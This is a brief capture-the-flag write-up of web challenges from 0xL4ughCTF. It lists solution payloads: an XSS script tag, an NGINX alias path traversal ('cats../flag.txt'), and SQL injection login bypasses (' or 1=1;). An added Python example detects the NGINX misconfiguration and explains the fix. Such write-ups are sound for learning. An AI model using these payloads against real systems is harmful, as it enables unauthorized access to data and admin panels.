0xL4ughCTF-write-up

Let’s solve the web challenges.

1 - Challenge Name : cake

cyber chef

2 - Challenge Name : sad_agent

burp-suite
cyber chef

3 - Challenge Name : Easy_Blog

user and pass = admin
anything to test
<script>document.getElementById('main').setAttribute('id','flagHunt');</script>
Flag:0xL4ugh{N0_Syst3m_1s_S@f3_3v3n_Y0u}

4 - Challenge Name : Cats

/flag.txt
nginx/1.19.6
Path traversal via a misconfigured NGINX
cats../flag.txt
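
The request `cats../flag.txt` fits the well-known NGINX `alias` off-by-slash pattern. Assuming that is the misconfiguration behind this challenge, the following added example (not from the original write-up or the challenge server) checks a config for it and shows how such a request resolves on disk. The sample config, file paths and function names are constructed for illustration.

```python
import posixpath
import re

# Constructed sample config (assumption, not the challenge server's real config):
# the first location has the vulnerable shape, the second the corrected one.
SAMPLE_CONF = """
server {
    listen 80;
    location /cats {
        alias /var/www/app/cats/;
    }
    location /dogs/ {
        alias /var/www/app/dogs/;
    }
}
"""

# Matches simple prefix locations without nested blocks; enough for an audit pass.
LOCATION = re.compile(
    r"location\s+(?:\^~\s+)?(?P<prefix>/[^\s{]*)\s*\{(?P<body>[^{}]*)\}", re.S)
ALIAS = re.compile(r"\balias\s+(?P<target>[^;]+);")

def find_off_by_slash(conf):
    """Return (prefix, alias) pairs where the alias ends in '/' but the prefix does not."""
    findings = []
    for loc in LOCATION.finditer(conf):
        alias = ALIAS.search(loc.group("body"))
        if not alias:
            continue
        prefix, target = loc.group("prefix"), alias.group("target").strip()
        if target.endswith("/") and not prefix.endswith("/"):
            findings.append((prefix, target))
    return findings

def resolve(prefix, target, uri):
    """Mimic alias mapping: swap the matched prefix for the alias target, then normalise."""
    if not uri.startswith(prefix):
        return None  # the location does not match this URI
    return posixpath.normpath(target + uri[len(prefix):])

if __name__ == "__main__":
    for prefix, target in find_off_by_slash(SAMPLE_CONF):
        print("off-by-slash:", prefix, "->", target)
        print("  /cats../flag.txt resolves to", resolve(prefix, target, "/cats../flag.txt"))
```

Ending the location prefix with a slash (`location /cats/`) so that it matches the alias is the fix: `/cats../flag.txt` then no longer matches that location.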

5 - Challenge Name : Embedding

Bad Character Detected or you Break The Limit

6 - Challenge Name : Dark Login

<!-- LnR4dA== --> base64 decodes to .txt
/flag.php
curl -X POST "40.112.217.104/Dark%20Login/flag.php"
user
pass
:)(:
Try To Access Element main An Inject HTML On It
see the console
796f754e6f774d650a.php
403 Forbidden
I Also Like The Parameters Specially If Its Value Was false
Your Password Is :- dac64421e6d507ef3817b661943ad3b3

7 - Challenge Name : Evil Panel

note > It's a Real Example Challenge , Try to use your brain to get the admin panel note : automated tools won’t help you

0xl4ugh Team
http://40.70.205.250/Evil_Panel/images/
/evil_admin.php
Your Entered Username/Password do not match with our database so please enter Right info…
' or 1=1;
Fatal error:
' or '1'='1;
Welcome Admin ….
Upload your File

End of the web challenges…… I solved them :)

Ahmed Magdy

Interested in infosec || CTF Player || Pentester || Bug Hunter || Security Researcher